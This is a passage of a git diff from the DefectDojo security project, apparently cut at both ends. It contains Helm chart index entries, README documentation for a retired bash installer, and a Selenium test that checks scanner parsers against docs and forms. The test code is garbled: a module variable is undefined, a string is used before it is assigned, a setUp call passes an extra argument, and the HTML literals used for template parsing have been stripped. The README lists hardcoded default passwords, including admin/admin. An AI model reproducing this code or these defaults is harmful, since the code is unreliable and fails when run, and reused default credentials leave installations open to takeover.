'@bitnami' + version: ~9.1.4 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 22250bd107c26ef4d7db02d18a9b34e0c1936caba91c4f95c381a88a73bc76eb + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.12.0/defectdojo-1.6.35.tgz + version: 1.6.35 + - apiVersion: v1 + appVersion: 2.10.0 + created: "2022-05-03T17:38:56.050833472Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: 8.8.12 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: 10.13.4 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: 8.24.2 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: 15.5.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 2e7f65a69b7ee72f9aeeb0b673900a60ea5e4a7bc1211d3fe92ebafbafbf5054 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.10.0/defectdojo-1.6.32.tgz + version: 1.6.32 + - apiVersion: v1 + appVersion: 2.9.1 + created: "2022-04-26T18:02:58.361407811Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: 8.8.12 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: 10.13.4 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: 8.24.2 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: 15.5.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 1deb3e54e45aca6e5bc30ebbbb6a76df754d31c20e031eeab97f0a6df0d55c61 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.9.1/defectdojo-1.6.31.tgz + version: 1.6.31 + - apiVersion: v1 + appVersion: 2.9.0 + created: "2022-04-05T22:35:50.885747474Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: 8.8.12 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: 10.13.4 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: 8.24.2 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: 15.5.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: dc19c0c00cb409da9ab1c5e34e6219c7e083539f266e2e06882ed27297f6cc9c + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.9.0/defectdojo-1.6.30.tgz + version: 1.6.30 + - apiVersion: v1 + appVersion: 2.8.0 + created: "2022-03-04T17:50:52.806376616Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: 8.8.12 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: 10.13.4 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: 8.24.2 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: 15.5.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: be9cee1ebb2695d9633f2ca3fbf2521db4e1012e02715fb0b3aa790676240c6f + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.8.0/defectdojo-1.6.29.tgz + version: 1.6.29 + - apiVersion: v1 + appVersion: 2.8.0 + created: "2022-03-01T18:32:45.106068588Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: 8.8.12 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: 10.13.4 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: 8.24.2 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: 15.5.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 58e0fb069799323d44a89e02622b4bd8545222fc3b9b8265cee0e15aaa314506 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.8.0/defectdojo-1.6.28.tgz + version: 1.6.28 + - apiVersion: v1 + appVersion: 2.7.1 + created: "2022-02-01T21:59:34.899337005Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: 8.8.12 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: 10.13.4 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: 8.24.2 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: 15.5.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: b313c5abe82a9343fc21d9b6634803047b46f283823eee14298519dd942759ac + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.7.1/defectdojo-1.6.27.tgz + version: 1.6.27 + - apiVersion: v1 + appVersion: 2.7.0 + created: "2022-02-01T19:04:20.875228017Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: 8.8.12 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: 10.13.4 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: 8.24.2 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: 15.5.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 1437cdcafcb2a145c4dd0b2fc8cb83529a3535f3ea485bd7f8158db29d5d317c + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.7.0/defectdojo-1.6.26.tgz + version: 1.6.26 + - apiVersion: v1 + appVersion: 2.6.2 + created: "2022-01-11T02:58:18.477230177Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: 8.8.12 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: 10.13.4 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: 8.24.2 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: 15.5.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: bb511e49aacadf25482d97ab952c02550f2e27554b99a2d92379f5344dffed40 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.6.2/defectdojo-1.6.24.tgz + version: 1.6.24 + - apiVersion: v1 + appVersion: 2.5.0 + created: "2021-12-07T23:14:19.882368853Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: 8.8.12 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: 10.13.4 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: 8.24.2 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: 15.5.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 250051edeeabe8c575de1ccd5f570155086402a5593be06c9c844425ff917a5b + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.5.0/defectdojo-1.6.23.tgz + version: 1.6.23 + - apiVersion: v1 + appVersion: 2.4.1 + created: "2021-11-06T20:55:15.929609397Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@stable' + version: 1.6.9 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: 10.3.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: 8.7.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: 12.0.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 11d7552f253d3e59ab5536612d1b3f8af65e0ae8df9f8952905b9496dd407a7e + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.4.1/defectdojo-1.6.22.tgz + version: 1.6.22 + - apiVersion: v1 + appVersion: 2.4.1 + created: "2021-11-06T20:51:36.65713234Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@stable' + version: 1.6.9 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: 10.3.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: 8.7.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: 12.0.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 821659b91e9c9d7d9176bf04a8ef40a21464088a7874fe26c96bf9f062f4b588 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.4.0/defectdojo-1.6.21.tgz + version: 1.6.21 + - apiVersion: v1 + appVersion: 2.3.1 + created: "2021-10-08T02:42:46.269226914Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@stable' + version: 1.6.9 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: 10.3.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: 8.7.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: 12.0.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: fdbeb36fbaa8e01ecf5b70f3c1a33f78bd7ae0cf654ff5ffc35d07de1f213127 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.3.1/defectdojo-1.6.15.tgz + version: 1.6.15 + - apiVersion: v1 + appVersion: 2.2.1 + created: "2021-09-10T20:53:16.1507396+02:00" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@stable' + version: 1.6.9 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: 10.3.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: 8.7.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: 12.0.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 1c497ca5dde77ad5cb96146724aab1b781566dd38e435e6f436e9327255c295d + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.2.1/defectdojo-1.6.12.tgz + version: 1.6.12 + - apiVersion: v1 + appVersion: 2.1.0 + created: "2021-07-27T16:26:25.236915528Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@stable' + version: 1.6.9 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: 10.3.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: 8.7.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: 12.0.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 3ac3a36da4e82ac69ecae51aa9578991f96cc8017f6af2c931f984b2c22a1420 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.1.0/defectdojo-1.6.10.tgz + version: 1.6.10 + - apiVersion: v1 + appVersion: 2.0.3 + created: "2021-06-30T10:26:00.492610684Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@stable' + version: 1.6.9 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: 10.3.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: 8.7.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: 12.0.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: a3d54cf4ff823530b7f343c0418272bdfd011ef9c17571d11061381a85480ff3 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.0.3/defectdojo-1.6.8.tgz + version: 1.6.8 + - apiVersion: v1 + appVersion: 2.0.2 + created: "2021-06-30T10:10:19.9611383Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@stable' + version: 1.6.9 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: 10.3.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: 8.7.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: 12.0.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 868c39d2a3c18ed6e1a85cf4c9257cfd277866dfbd17ec794a72bc5a02960abb + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.0.2/defectdojo-1.6.7.tgz + version: 1.6.7 + - apiVersion: v1 + appVersion: 2.0.1 + created: "2021-06-29T18:08:44.067236839Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@stable' + version: 1.6.9 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: 10.3.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: 8.7.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: 12.0.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 26fb9677ac360264aebd96561c156f96cb1d910c50448dd4e8aaf5e41eb3894d + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.0.1/defectdojo-1.6.6.tgz + version: 1.6.6 + - apiVersion: v1 + appVersion: 2.3.0 + created: "2021-10-05T18:12:15.162260443Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@stable' + version: 1.6.9 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: 10.3.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: 8.7.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: 12.0.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 9e5f8fb180d9e571f37f087fcfddd18514af1148c894182681a3aa28776fa023 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.3.0/defectdojo-1.6.5.tgz + version: 1.6.5 + - apiVersion: v1 + appVersion: 1.15.1 + created: "2021-06-06T13:02:58.673666737Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@stable' + version: 1.6.9 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: 10.3.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: 8.7.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: 12.0.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: bf4c0a301ef46879b813441c3cb6209faa96004c1e779355d8a7b6d1bac861ec + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/1.15.1/defectdojo-1.6.2.tgz + version: 1.6.2 + - apiVersion: v1 + appVersion: 1.15.0 + created: "2021-04-29T18:51:00.350333917Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@stable' + version: 1.6.9 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: 10.3.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: 8.7.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: 12.0.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 9b15962019aa8b2c2cf1540b74ab378aa8c2c5568fcee53f1e02317643e6c834 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/1.15.0/defectdojo-1.6.1.tgz + version: 1.6.1 +generated: "2026-06-08T06:35:13.899036009Z" diff --git a/manage.py b/manage.py index 61bc69ff529..89b3e2169bc 100755 --- a/manage.py +++ b/manage.py @@ -2,6 +2,7 @@ import os import sys + if __name__ == "__main__": os.environ.setdefault("DJANGO_SETTINGS_MODULE", "dojo.settings.settings") diff --git a/setup/README.md b/setup/README.md new file mode 100644 index 00000000000..3728566e10f --- /dev/null +++ b/setup/README.md @@ -0,0 +1,115 @@ +## END OF LIFE ## +This install method is end of life and has been removed from the codebase. The documentation below is only here for future reference and may be removed at any point in time. + +## Documentation on setup.bash + +The bash script setup.bash was created to automate installation of Defect Dojo and allow for the following install situations to be automated: + +### Supported Installs + +* Single Server - simplest DefectDojo install where DefectDojo, Dojo dependencies and 3rd party services are installed on a single server. [default install] +* Dev Install - install for local development where a Single Server install is run with credentials and other passwords set to known values. +* Stand-alone Server - install DefectDojo & Dojo dependencies only where 3rd party services (database) is running on other infrastructure. +* ? Docker Single Server - a Single Server install where DefectDojo, Dojo dependencies and 3rd party services are installed in a single container +* ? Docker Stand-alone - a Stand-alone Server install DefectDojo & Dojo dependencies only are installed in a single container. + +Note: Cloning the DefectDojo repo and running ./setup.bash does a single server interactive install. Doing other install methods requires setting configuration values and/or using command-line options. + +### TDB install situations + +* Docker Dev Install - a dev install that uses docker + a mounted local directory structure to isolate dojo code from the rest of the run-time. +* Fronted Dojo Installs - a install of DefectDojo where a separate HTTP server answers the initial requests for DefectDojo such as using Nginx upstream of DefectDojo + +### Assumptions + +All installs make these assumption: + +* DefectDojo will be run in a virtualenv +* All installs support an interactive and non-interactive install methods +* All installation configuration lives in ./dojo/settings/template-env + * Running setup.bash without editing template-env assumes a single-server install. + * Running setup.bash without editing template-env non-interactively assumes a single-server install with MySQL +* Any install configuration variable can be overridden by setting an environmental variable +* One of the following Operating Systems is used as the base for the install + * Ubuntu Linux - officially supported versions: 16.04 LTS, 18.04 LTS + * CentOS - officially supported versions: ? + * Mac OS X - officially supported versions: ? + +### Definitions + +* DefectDojo - the source code and supporting files for DefectDojo contained in the Github repo at https://github.com/DefectDojo/django-DefectDojo +* Dojo dependencies - any additional software, libraries or services needed to install and run the software in the DefectDojo repo. This includes Django and other pip packages, celery workers, and any binaries required to run DefectDojo +* 3rd party services - additional services not maintained by DefectDojo but needed to run DefectDojo - currently a database + +### Command-line options + +``` + ./setup.bash --help +Usage: ./setup.bash [OPTION]... + +Install DefectDojo in an interactive (default) or non-interactive method + +Options: + -h or --help Display this help message and exit with a status code of 0 + -n or --non-interactive Run install non-interactivity e.g. for Dockerfiles or automation + +Note: No options are required, all are optional +``` + +### Installer details + +setup.bash relies on the following files and directory structure: + +``` +setup.bash => the main install program +├── scripts + ├── common + ├── config-vars.sh + ├── cmd-args.sh + ├── prompt.sh +``` + +Install configuration is in [config-vars.sh](scripts/common/config-vars.sh) contains the following install options and default values: + +**Format for this list:** *install option* [default value] - *definition* + +* PROMPT [true] - Run the install in interactive mode aka prompt the user for config values +* DB_TYPE [MySQL] - The database type to be used by DefectDojo +* DB_LOCAL [true] - Boolean for if the database is installed locally aka on the same OS as DefectDojo +* DB_EXISTS [false] - Boolean for if the database already exists for DefectDojo to use aka doesn't need to be installed +* DB_NAME [dojodb] - Name of the database created to store DefectDojo data +* DB_USER [dojodbusr] - Database username used to access the DefectDojo database +* DB_PASS [vee0Thoanae1daePooz0ieka] - Default password used only for Dev installs, otherwise a random 24 character password is created at install time +* DB_HOST [localhost] - Database hostname where the DefectDojo database is located +* DB_PORT [3306] - Port database is listening on, default port is for the default database MySQL +* DB_DROP_EXISTING [true] - If the database name already exists in database server for DefectDojo, drop that database if this is true. If false and a database name match occurs, throw an error and exit the installer. +* OS_USER=${OS_USER:-"dojo-srv"} +* OS_PASS=${OS_PASS:-"wahlieboojoKa8aitheibai3"} +* OS_GROUP=${OS_GROUP:-"dojo-srv"} +* INSTALL_ROOT=${INSTALL_ROOT:-"/opt/dojo"} +* DOJO_SOURCE=${DOJO_SOURCE:-"$INSTALL_ROOT/django-DefectDojo"} +* DOJO_FILES=${DOJO_FILES:-"$INSTALL_ROOT/local"} +* MEDIA_ROOT=${MEDIA_ROOT:-"$DOJO_FILES/media"} +* STATIC_ROOT=${STATIC_ROOT:-"$DOJO_FILES/static"} +* ADMIN_USER=${ADMIN_USER:-"admin"} +* ADMIN_PASS=${ADMIN_PASS:-"admin"} +* ADMIN_EMAIL=${ADMIN_EMAIL:-"ed@example.com"} + +Configuration items for setup.py are in template-env in ./dojo/settings/ and contain + + +### Installers workflow + +1. Check for command-line arguments, if none, do an interactive single server install +2. Check for install OS +3. Bootstrap any software needed by the install process +4. Install Dojo dependencies +5. Install 3rd party services + + +### Installer Bash variables + +* SETUP_BASE : The full path to where the setup.bash file is located e.g ./setup if starting from the Dojo repository root +* REPO_BASE : The full path to where the DefectDojo source was cloned usually /opt/dojo/django-DefectDojo +* LIB_PATH : The full path to where the configuration values and libraries are for the DefectDojo installer which is SETUP_BASE + /scripts/common/ +* DB_TYPPE : The database type DefectDojo will use - currently either SQLite, MySQL or PostgreSQL diff --git a/tests/Import_scanner_test.py b/tests/Import_scanner_test.py new file mode 100644 index 00000000000..90c5db5d693 --- /dev/null +++ b/tests/Import_scanner_test.py @@ -0,0 +1,270 @@ +from selenium.webdriver.support.ui import Select +import unittest +import re +import sys +import os +import git +import shutil +from base_test_class import BaseTestCase +from product_test import ProductTest +from selenium.webdriver.common.by import By + + +class ScannerTest(BaseTestCase): + def setUp(self): + super().setUp(self) + self.repo_path = dir_path + '/scans' + if os.path.isdir(self.repo_path): + shutil.rmtree(self.repo_path) + os.mkdir(self.repo_path) + scan_types = git.Repo.clone_from('https://github.com/DefectDojo/sample-scan-files', self.repo_path) + self.remove_items = ['__init__.py', '__init__.pyc', 'factory.py', 'factory.pyc', + 'factory.py', 'LICENSE', 'README.md', '.gitignore', '.git', '__pycache__'] + tool_path = dir_path[:-5] + 'dojo/tools' + tools = sorted(os.listdir(tool_path)) + tests = sorted(os.listdir(self.repo_path)) + self.tools = [i for i in tools if i not in self.remove_items] + self.tests = [i for i in tests if i not in self.remove_items] + + def test_check_test_file(self): + missing_tests = ['MISSING TEST FOLDER'] + for tool in self.tools: + if(tool not in self.tests): + missing_tests += [tool] + + missing_tests += ['\nNO TEST FILES'] + + for test in self.tests: + cases = sorted(os.listdir(self.repo_path + '/' + test)) + cases = [i for i in cases if i not in self.remove_items] + if len(cases) == 0 and tool not in missing_tests: + missing_tests += [test] + + if len(missing_tests) > 0: + print('The following scanners are missing test cases or incorrectly named') + print('Names must match those listed in /dojo/tools') + print('Test cases can be added/modified here:') + print('https://github.com/DefectDojo/sample-scan-files\n') + for test in missing_tests: + print(test) + print() + assert len(missing_tests) == 0 + + def test_check_for_doc(self): + driver = self.driver + driver.get('https://defectdojo.github.io/django-DefectDojo/integrations/import/') + + integration_index = integration_text.index('Integrations') + len('Integrations') + 1 + usage_index = integration_text.index('Usage Examples') - len('Models') - 2 + integration_text = integration_text[integration_index:usage_index].lower() + integration_text = integration_text.replace('_', ' ').replace('-', ' ').replace('.', '').split('\n') + acronyms = [] + for words in integration_text: + acronyms += ["".join(word[0] for word in words.split())] + + missing_docs = [] + for tool in self.tools: + reg = re.compile('.*' + tool.replace('_', ' ') + '.*') + if len(list(filter(reg.search, integration_text))) < 1: + if len(list(filter(reg.search, acronyms))) < 1: + missing_docs += [tool] + + if len(missing_docs) > 0: + print('The following scanners are missing documentation') + print('Names must match those listed in /dojo/tools') + print('Documentation can be added here:') + print('https://github.com/DefectDojo/django-DefectDojo/tree/dev/docs\n') + for tool in missing_docs: + print(tool) + print() + assert len(missing_docs) == 0 + + def test_check_for_forms(self): + forms_path = dir_path[:-5] + 'dojo/forms.py' + file = open(forms_path, 'r+') + forms = file.readlines() + file.close() + + forms = [form.strip().lower() for form in forms] + forms = forms[forms.index('scan_type_choices = (("", "please select a scan type"),') + 1: + forms.index('sorted_scan_type_choices = sorted(scan_type_choices, key=lambda x: x[1])') - 1] + forms = [form.replace('(', '').replace(')', '').replace('-', ' ').replace('"', '').replace('.', '') for form in forms] + forms = [form[:form.index(',')] for form in forms] + remove_patterns = [' scanner', ' scan'] + for pattern in remove_patterns: + forms = [re.sub(pattern, '', fix) for fix in sorted(forms)] + + acronyms = [] + for words in forms: + acronyms += ["".join(word[0] for word in words.split())] + + missing_forms = [] + for tool in self.tools: + reg = re.compile(tool.replace('_', ' ')) + matches = list(filter(reg.search, forms)) + list(filter(reg.search, acronyms)) + matches = [m.strip() for m in matches] + if len(matches) != 1: + if tool not in matches: + missing_forms += [tool] + + if len(missing_forms) > 0: + print('The following scanners are missing forms') + print('Names must match those listed in /dojo/tools') + print('forms can be added here:') + print('https://github.com/DefectDojo/django-DefectDojo/blob/master/dojo/forms.py\n') + for tool in missing_forms: + print(tool) + print() + assert len(missing_forms) == 0 + + @unittest.skip("Deprecated since Dynamic Parser infrastructure") + def test_check_for_options(self): + template_path = dir_path[:-5] + 'dojo/templates/dojo/import_scan_results.html' + file = open(template_path, 'r+') + templates = file.readlines() + file.close() + + templates = [temp.strip().lower() for temp in templates] + templates = templates[templates.index('
      ') + 1: + templates.index('
    ')] + remove_patterns = ['
  • ', '', '
  • ', ' scanner', ' scan'] + for pattern in remove_patterns: + templates = [re.sub(pattern, '', temp) for temp in templates] + + templates = [temp[:temp.index(' - ')] for temp in sorted(templates) if ' - ' in temp] + templates = [temp.replace('-', ' ').replace('.', '').replace('(', '').replace(')', '') for temp in templates] + + acronyms = [] + for words in templates: + acronyms += ["".join(word[0] for word in words.split())] + + missing_templates = [] + for tool in self.tools: + temp_tool = tool.replace('_', ' ') + reg = re.compile(temp_tool) + matches = list(filter(reg.search, templates)) + list(filter(reg.search, acronyms)) + matches = [m.strip() for m in matches] + if len(matches) == 0: + if temp_tool not in matches: + missing_templates += [tool] + + if len(missing_templates) > 0: + print('The following scanners are missing templates') + print('Names must match those listed in /dojo/tools') + print('templates can be added here:') + print('https://github.com/DefectDojo/django-DefectDojo/blob/master/dojo/templates/dojo/import_scan_results.html\n') + for tool in missing_templates: + print(tool) + print() + assert len(missing_templates) == 0 + + def test_engagement_import_scan_result(self): + driver = self.driver + self.goto_product_overview(driver) + driver.find_element(By.CSS_SELECTOR, ".dropdown-toggle.pull-left").click() + driver.find_element(By.LINK_TEXT, "Add New Engagement").click() + driver.find_element(By.ID, "id_name").send_keys('Scan type mapping') + driver.find_element(By.NAME, '_Import Scan Results').click() + options_text = ''.join(driver.find_element(By.NAME, 'scan_type').text).split('\n') + options_text = [scan.strip() for scan in options_text] + + mod_options = options_text + mod_options = [re.sub(' Scanner', '', scan) for scan in mod_options] + mod_options = [re.sub(' Scan', '', scan) for scan in mod_options] + mod_options = [scan.lower().replace('-', ' ').replace('.', '') for scan in mod_options] + + acronyms = [] + for scans in mod_options: + acronyms += ["".join(scan[0] for scan in scans.split())] + + potential_matches = mod_options + acronyms + scan_map = {} + + for test in self.tests: + temp_test = test.replace('_', ' ').replace('-', ' ') + reg = re.compile('.*' + temp_test + '.*') + found_matches = {} + for i in range(len(potential_matches)): + matches = list(filter(reg.search, [potential_matches[i]])) + if len(matches) > 0: + index = i + if i >= len(mod_options): + index = i - len(mod_options) + found_matches[index] = matches[0] + + if len(found_matches) == 1: + index = list(found_matches.keys())[0] + scan_map[test] = options_text[index] + elif len(found_matches) > 1: + try: + index = list(found_matches.values()).index(temp_test) + scan_map[test] = options_text[list(found_matches.keys())[index]] + except: + pass + + failed_tests = [] + for test in self.tests: + cases = sorted(os.listdir(self.repo_path + '/' + test)) + cases = [i for i in cases if i not in self.remove_items] + if len(cases) == 0: + failed_tests += [test.upper() + ': No test cases'] + for case in cases: + self.goto_product_overview(driver) + driver.find_element(By.CSS_SELECTOR, ".dropdown-toggle.pull-left").click() + driver.find_element(By.LINK_TEXT, "Add New Engagement").click() + driver.find_element(By.ID, "id_name").send_keys(test + ' - ' + case) + 